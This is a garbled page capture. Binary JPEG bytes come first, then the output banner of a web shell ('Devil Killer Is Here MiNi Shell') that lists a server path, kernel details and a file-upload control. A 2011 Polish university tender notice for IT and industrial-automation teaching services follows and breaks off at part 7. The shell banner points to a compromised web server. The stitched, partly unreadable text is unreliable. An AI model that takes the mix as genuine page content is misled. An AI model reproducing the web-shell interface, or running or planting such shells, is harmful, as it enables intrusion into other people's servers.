JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20111109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20111109/292543-N-2011.html

<p class="kh_header"><b>Gliwice: Przeprowadzenie zajęć, konsultacji i egzaminów na nowym kierunku i nowych specjalnościach. Oznaczenie sprawy: OZ/U/46/EK/11</b><br>
<b>Numer ogłoszenia: 292543 - 2011; data zamieszczenia: 09.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Śląska , ul. Akademicka 2A, 44-100 Gliwice, woj. śląskie, tel. (032) 237 13 34, 2371335, faks 0322371334, 2372255, 2372660.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.polsl.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.polsl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie zajęć, konsultacji i egzaminów na nowym kierunku i nowych specjalnościach. Oznaczenie sprawy: OZ/U/46/EK/11.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest przeprowadzenie zajęć dydaktycznych wraz z egzaminami, zaliczeniami i konsultacjami dla studentów Politechniki Śląskiej. Przedmiot zamówienia został podzielony na 11 zadań. 
2. CPV: 80.51.00.00-2-usługi szkolenia specjalistyczne. 
3. Termin realizacji (dotyczy wszystkich zadań): do 13.02.2012r., w tym:
- termin przeprowadzenia zajęć: do 22.01.2012r. zgodnie z ustalonym  harmonogramem zajęć,
- zaliczenie, egzaminy muszą zostać przeprowadzone w terminie od 23.01.2012r. do 13.02.2012r. W tym terminie mogą odbyć się maksymalnie 3 terminy zaliczeń lub egzaminów, przy czym pomiędzy poszczególnymi terminami musi być min. 5 dni przerwy.
- przekazanie Zamawiającemu do zatwierdzenia: listy obecności, sprawozdania oraz karty pracy -  nie później niż w ciągu 4 dni roboczych po zakończeniu zajęć.
UWAGA!!!
Ze względu na brak możliwości technicznych w pkt II.2) niniejszego ogłoszenia podano jedynie termin zakończenia realizacji zamówienia, jednakże wiążący jest termin dotyczący kompleksowej realizacji zamówienia jw.
4. Wartość niniejszego zamówienia przekracza 14.000 Euro i nie przekracza 193.000 Euro.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 13.02.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie minimum 1 osobą zdolną do wykonania zamówienia, która będzie odpowiedzialna m. in. za prawidłową realizację zamówienia, a ponadto:
a) posiada co najmniej tytuł zawodowy mgr z dyscypliny informatyka lub stopień doktora nauk oraz
b) posiada doświadczenie w prowadzeniu zajęć dydaktycznych zakończonych egzaminem lub zaliczeniem w szkole wyższej przez co najmniej 2 semestry z dyscypliny informatyka.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wymagane dokumenty i załączniki potwierdzające spełnianie wymagań dotyczących przedmiotu zamówienia: 1. Na potwierdzenie zaoferowania ceny, terminu realizacji i warunków realizacji zamówienia: 1.1 Oferta Cenowa.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Pisemne zobowiązanie innych podmiotów lub inne dokumenty potwierdzające oddanie Wykonawcy do dyspozycji niezbędnych zasobów, o których mowa w pkt. III.3.4 - jeżeli dotyczy. 2) Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III 4.3.1  niniejszego ogłoszenia, zastępuje się je dokumentami zawierającymi oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 3) Dokumenty sporządzone w języku obcym powinny być złożone wraz z tłumaczeniem na język polski, za wyjątkiem dokumentów, których złożenie Zamawiający dopuścił w języku obcym. 4) Ww. dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę (czytelny podpis upoważnionego przedstawiciela lub imienna pieczątka z parafą) tj. przez osoby reprezentujące Wykonawcę lub przez pełnomocnika upoważnionego do złożenia oferty w jego imieniu. Sposób reprezentacji musi być zgodny z właściwym wypisem z rejestru. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia oraz w przypadku innych podmiotów (oddających Wykonawcy do dyspozycji niezbędne zasoby na okres korzystania z nich przez Wykonawcę przy wykonywaniu zamówienia) kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów powinny być poświadczone za zgodność z oryginałem przez Wykonawcę lub te podmioty. 5) W przypadku składania oświadczeń lub podpisywania jakichkolwiek dokumentów przez PEŁNOMOCNIKA wymagane jest dołączenie oryginału pełnomocnictwa z podpisem mocodawcy lub kopii uwierzytelnionej notarialnie. 6) Wykonawcy mogą wspólnie ubiegać się o udzielenia zamówienia. W tym przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do tych Wykonawców. Należy dołączyć do oferty stosowne pełnomocnictwo do reprezentowania podmiotów występujących wspólnie w postępowaniu o udzielenie zamówienia; pełnomocnictwo to powinno być udzielone (podpisane) przez podmioty występujące wspólnie. Jeżeli oferta Wykonawców, występujących wspólnie zostanie wybrana, Zamawiający (przed zawarciem umowy) może żądać umowy regulującej ich współpracę. 7) Zamawiający nie wymaga, aby Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji zamówienia, przedkładał także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Nie będą możliwe istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem następujących przypadków: 
1.zmiany terminu realizacji zamówienia ze względu na:
-   warunki atmosferyczne,
-    przyczyny leżące po stronie Zamawiającego
-   inne niezawinione przyczyny spowodowane przez tzw. siłę wyższąnp. pożar, zalanie itp. 
2.poprawy jakości lub innych parametrów charakterystycznych dla danego elementu usługi, 
3.zmiany w kolejności i terminach realizacji zamówienia, zmiany w kolejności i terminach płatności (w tym płatności częściowe - jeżeli dotyczy) za realizację zamówienia w sytuacji, kiedy są one korzystne dla Zamawiającego,
4.zmiany kluczowego personelu Wykonawcy lub Zamawiającego (osoby upoważnione do reprezentowania stron w sprawach związanych z realizacją zamówienia),
5.zmiany podwykonawcy ze względów losowych lub innych korzystnych dla Zamawiającego - w przypadku zadeklarowania przez Wykonawcę realizacji zamówienia przy pomocy podwykonawców,
6.zmiany miejsca przeprowadzenia zajęć;
7.obniżenie ilości/wielkości przedmiotu zamówienia i tym samym wynagrodzenia Wykonawcy, wynikające z zaistnienia obiektywnych przesłanek konieczności takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.polsl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Politechnika Śląska, Dział Zamówień Publicznych i Zaopatrzenia, 44-100 Gliwice, ul. Konarskiego 18 pok. 511.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.11.2011 godzina 12:30, miejsce: Politechnika Śląska, Dział Zamówień Publicznych i Zaopatrzenia, 44-100 Gliwice, ul. Konarskiego 18 pok. 511..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest finansowany na podstawie umowy UDA - POKL.04.01.01-00-386 09-00 z dnia 4.12.2009 r. Otwarcie nowego kierunku studiów i nowych specjalności oraz organizacja specjalistycznych kursów 
w Politechnice Śląskiej wraz z systemem staży dla kadry akademickiej uczelni. Projekt realizowany w ramach Europejskiego Funduszu Społecznego Priorytet IV, Działanie 1, Poddziałanie 1 Program Operacyjny Kapitał Ludzki.
Rozliczenie nastąpi na podstawie faktury VAT/rachunku wystawionego na Politechnikę Śląską, 44 - 100 Gliwice, ul. Akademicka 2A, pod warunkiem że Wykonawca dotrzyma wszystkich terminów i warunków zawartych w umowie, dostarczy: listy obecności, sprawozdania oraz karty pracy, i ww. dokumenty zostaną uznane przez Zamawiającego jako prawidłowe. 
Zamawiający zobowiązuje się dokonać zapłaty należności na rachunek Wykonawcy podany na fakturze/rachunku w terminie do 30 dni od daty wystawienia faktury/rachunku i spełnienia warunków umowy.
Faktura zapłacona zostanie z konta Zamawiającego tj. konta Projektu:  ING Bank Śląski S.A. w Katowicach nr 79 1050 1230 1000 0023  4458 2172..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 - Przeprowadzenie zajęć, konsultacji i egzaminów z przedmiotu Bezpieczeństwo systemów komputerowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje przeprowadzenie zajęć wraz z konsultacjami oraz zaliczenia z przedmiotu Bezpieczeństwo systemów komputerowych dla studentów III roku kierunku Informatyka przemysłowa, studia stacjonarne I stopnia.Celem zajęć jest poszerzenie wiedzy praktycznej uczestników na temat bezpieczeństwa systemów komputerowych. Szczegółowy zakres zajęć:
1.Mechanizmy lokalnej kontroli dostępu
2.ACL  w wielu rodzajach systemów plików Linux i Windows, np.: ext2, ext3, ext4, reiserfs, ntfs.
3.Systemy wykrywania włamań IDS (snort) - budowa, tworzenie reguł
4.Zastosowanie systemów wykrywania włamań, implementacja i konfiguracja
5.Tworzenie sieci VPN w środowisku Linux i Windows
6.Wykorzystanie bezpiecznych protokołów wymiany danych SSL i IPSEC.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 - Przeprowadzenie zajęć, konsultacji i egzaminów z przedmiotu Sieci Komputerowe..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje przeprowadzenie zajęć wraz z konsultacjami oraz zaliczenia z przedmiotu Sieci Komputerowe dla studentów III roku kierunku Informatyka przemysłowa, studia stacjonarne I stopnia.Celem zajęć jest poszerzenie wiedzy praktycznej uczestników na temat sieci komputerowych. Szczegółowy zakres zajęć:
1. Konfiguracja routingu
Zapoznanie z zasadami komunikacji w sieciach LAN i WAN
a)Konfiguracja routera i protokołu IP
b)Konfiguracja protokołów routingu statycznego,
c)Konfiguracja protokołów routingu dynamicznego,
d)Testowanie komunikacji
2. Konfiguracja VLANów
Zapoznanie z koncepcją wirtualnych sieci lokalnych
a)Zasady definiowania VLANów,
b)Przypisywanie stacji roboczych do VLANów,
c)Konfiguracja komunikacji między VLANami
d)Testowanie komunikacji w VLANach
3. Konfiguracja stacji roboczej środowiska sieciowego
Przedstawienie pojęcia środowiska sieciowego stacji roboczej
a)Konfiguracja adresacji stacji, przynależności do grupy roboczej domeny
b)Konfigurowanie dostępu do zasobów sieciowych,
c)Konfigurowanie serwera wydruku
4. Monitorowanie ruchu pakietów w sieci
Zapoznanie z narzędziami do monitorowania ruchu sieciowego
a)monitorowanie protokołu ARP,
b)monitorowanie protokołu DHCP,
c)monitorowanie protokołu DNS,
d)monitorowanie protokołów aplikacyjnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 - Przeprowadzenie zajęć, konsultacji i egzaminów z przedmiotu Wizualizacja Procesów Przemysłowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje przeprowadzenie zajęć wraz z konsultacjami oraz zaliczenia z przedmiotu Wizualizacja Procesów Przemysłowych dla studentów II semestru kierunku Informatyka przemysłowa, studia niestacjonarne II stopnia, specjalność Systemy Przemysłowe Czasu Rzeczywistego.Celem zajęć jest poszerzenie wiedzy praktycznej uczestników na temat wizualizacji procesów przemysłowych. 
Szczegółowy zakres zajęć:
1. SCADA - InTouch
2. Panele operatorskie Unitronics
3. Wizualizacja WWW - Saia Burgess
4. Standard OPC
5. Siemens WinCC.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4 - Przeprowadzenie zajęć, konsultacji i egzaminów z przedmiotu Integracja Systemów Zarządzania Przedsiębiorstwem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje przeprowadzenie zajęć wraz z konsultacjami oraz zaliczenia z przedmiotu Integracja Systemów Zarządzania Przedsiębiorstwem dla studentów II semestru kierunku Informatyka przemysłowa, studia niestacjonarne II stopnia, specjalność Systemy Przemysłowe Czasu Rzeczywistego.Celem zajęć jest poszerzenie wiedzy praktycznej uczestników na temat integracji systemów zarządzania przedsiębiorstwem. Szczegółowy zakres zajęć:
1. Akwizycja danych procesowych 
2. Udostępnianie danych procesowych 
3. Raportowanie produkcji 
4. Integracja z systemami nadrzędnymi 
5. Analiza i raportowanie danych procesowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5 - Przeprowadzenie zajęć, konsultacji i egzaminów z przedmiotu Przemysłowe Systemy Czasu Rzeczywistego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje przeprowadzenie zajęć wraz z konsultacjami oraz zaliczenia z przedmiotu Przemysłowe Systemy Czasu Rzeczywistego dla studentów II semestru kierunku Informatyka przemysłowa, studia niestacjonarne II stopnia, specjalność Systemy Przemysłowe Czasu Rzeczywistego.Celem zajęć jest poszerzenie wiedzy praktycznej uczestników na temat przemysłowych systemów czasu rzeczywistego. Szczegółowy zakres zajęć:
1. Podstawy programowania GE Fanuc
2. Programowanie sterowników GE Fanuc - procedury 
3. GE Fanuc - winda 
4. Regulacja ciągła 
5. Przemienniki częstotliwości.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6 - Przeprowadzenie zajęć, konsultacji i egzaminów z przedmiotu Zaawansowane programowanie sterowników przemysłowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje przeprowadzenie zajęć wraz z konsultacjami oraz zaliczenia z przedmiotu Zaawansowane programowanie sterowników przemysłowych dla studentów II semestru kierunku Informatyka przemysłowa, studia niestacjonarne II stopnia, specjalność Systemy Przemysłowe Czasu Rzeczywistego.Celem zajęć jest poszerzenie wiedzy praktycznej uczestników na temat programowania sterowników przemysłowych. Szczegółowy zakres zajęć:
1. Programowanie sterowników wg normy IEC61131-3. Język IL 
2. Programowanie sterowników wg normy IEC61131-3. Język LD 
3. Programowanie sterowników wg normy IEC61131-3. Język SFC 
4. Programowanie sterowników wg normy IEC61131-3. Język FBD 
5. Programowanie sterowników wg normy IEC61131-3. Język ST.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7 - Przeprowadzenie zajęć, konsultacji i egzaminów z przedmiotu Konstrukcja i oprogramowanie systemów wbudowanych.</p>
